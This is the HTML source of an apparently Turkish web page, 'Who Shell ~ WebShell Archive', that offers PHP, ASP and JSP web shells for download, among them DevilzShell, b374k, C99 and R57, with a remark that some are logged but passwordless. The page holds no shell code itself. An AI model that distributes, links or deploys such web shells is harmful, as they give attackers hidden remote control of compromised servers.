<html>
    <head>
        <!--tema ata mavi tarafindan olusturulmustur kullanimi ve dagitimi serbesttir. -->
    <meta charset="UTF-8"/>
    <title>Shell ~ Who</title>
    <link rel="stylesheet" href="main.css">
    <script src="https://code.jquery.com/jquery-2.2.4.min.js"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
 
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous">
 
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
    </head>
    

<body class="container-fluid"> <br>
<div class="logo"><font>Who Shell</font></div>
<div class="vaziyetal">
    <b><font color="green">
        <center>Bazilari logludur fakat sifresizdir dilerseniz loglari kaldirabilirsiniz.</center></font></b>
    <div class="nav">
<a href="#">Blog</a>|
<a href="#">iLetişim</a>
</div>
<div class="sheller">
<hr class="cizgi">

<center><h4>PHP</h4></center>
<table border="1" >
<tr>
<th>Zip Download</th>
<th>Php Download</th>
</tr>
<tr>
<td><a href="./shell/devilzshell.zip">DevilzShell.zip</a></td>
<td><a href="./shell/devilzshell.php">DevilzShell.php</a></td>
</tr>
<tr>
<td><a href="./shell/b374k.php">b374k.zip</a></td>
<td><a href="./shell/b374k.php">b374k.php</a></td>
</tr>
<tr>
<td><a href="#">Webadmin</a></td>
<td><a href="#">Webadmin</a></td>
</tr>
<tr>
<td><a href="#">Uploader</a></td>
<td><a href="#">Uploader</a></td>
</tr>
<tr>
<td><a href="#">R57</a></td>
<td><a href="#">R57</a></td>
</tr>
</table>
<hr class="cizgi">
<center><h4>ASP</h4></center>
<table border="1" >
<tr>
<th>Zip Download</th>
<th>Txt Download</th>
</tr>
<tr>
<td><a href="#">Sadrazam</a></td>
<td><a href="#">Sadrazam</a></td>
</tr>
<tr>
<td><a href="#">C99</a></td>
<td><a href="#">C99</a></td>
</tr>
<tr>
<td><a href="#">Webadmin</a></td>
<td><a href="#">Webadmin</a></td>
</tr>
<tr>
<td><a href="#">Uploader</a></td>
<td><a href="#">Uploader</a></td>
</tr>
<tr>
<td><a href="#">R57</a></td>
<td><a href="#">R57</a></td>
</tr>
</table>
<hr class="cizgi">
<center><h4>JSP</h4></center>
<table border="1" >
<tr>
<th>Zip Download</th>
<th>Txt Download</th>
</tr>
<tr>
<td><a href="#">JSP Shell</a></td>
<td><a href="#">JSP Shell</a></td>
</tr>

</table>
<hr class="cizgi">


  </div>

</div>

<center>
© 2017 ~ WebShell Archive ~
</center>
    </body>


</html>
